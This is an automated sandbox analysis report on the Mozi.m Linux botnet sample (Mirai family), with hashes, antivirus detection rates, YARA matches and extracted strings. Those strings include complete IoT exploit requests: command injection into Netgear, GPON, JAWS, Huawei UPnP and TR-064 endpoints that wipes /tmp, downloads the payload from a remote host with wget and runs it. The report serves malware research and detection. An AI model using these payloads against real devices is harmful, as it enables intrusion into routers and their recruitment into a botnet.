Linux Analysis Report Mozi.m

Overview

General Information

Sample Name:	Mozi.m
Analysis ID:	451140
MD5:	1af4de72c3ecf9b8b42f585232da79ff
SHA1:	c7329de7741529b10c49a0aae595fdbf6ed59374
SHA256:	ad23d3c3a70c722f36f005a0660fe2dbf6385fc6da6c799d0feb81599dd7e341
Infos:

Detection

Mirai

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Sample is packed with UPX

Sample contains only a LOAD segment without any section mappings

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings that are potentially command strings

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: Mozi.m

Avira: detected

Multi AV Scanner detection for submitted file

Source: Mozi.m	Virustotal: Detection: 59%	Perma Link
Source: Mozi.m	Metadefender: Detection: 32%	Perma Link
Source: Mozi.m	ReversingLabs: Detection: 65%

Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.m	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: Mozi.m	String found in binary or memory: http://upx.sf.net

System Summary:

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x400000

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: mv -f
Source: Initial sample	Potential command found: w s"z6
Source: Initial sample	Potential command found: POST /GponForm/diag_?i
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Yara signature match

Source: Mozi.m, type: SAMPLE

Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4

Source: classification engine

Classification label: mal84.troj.evad.linM@0/2@0/0

Data Obfuscation:

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/Mozi.m (PID: 4568)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4616)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 4654)	Queries kernel information via 'uname':	Jump to behavior

Screenshots

No Screenshots

Network Map

No contacted IP infos

ID:	451140
Product:	CloudBasic
Start time:	10:04:09
Start date:	20.07.2021
Sample:	Mozi.m
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Architecture:	LINUX
MD5:	1af4de72c3ecf9b8b42f585232da79ff
SHA1:	c7329de7741529b10c49a0aae595fdbf6ed59374
SHA256:	ad23d3c3a70c722f36f005a0660fe2dbf6385fc6da6c799d0feb81599dd7e341
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Name	Type	MD5	SHA1	SHA256
/var/crash/_usr_share_apport_apport-checkreports.1000.crash	ASCII text	80828C09D042D9DC707F07350E8FD4DE	0F7E28B09B7A2D1075456FC5FD0DADBDC0B4FA73	C0E4D182E7ADC55F20BCB948F12241529C035DC7A544CF5C5A08F4E64DF26EAE
/var/crash/_usr_share_apport_apport-gtk.1000.crash	ASCII text	16A332E6310A4D2ED0B7E04727FA00B4	C1E697C3CE2406FD8680D54447D807461AE285E3	C7BA090AA93562EC63F6BA0EB66B41E0287426182C7B9D268166A60007ABAFEC

Linux Analysis Report Mozi.m

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Malware Analysis System Evasion:

Screenshots

Network Map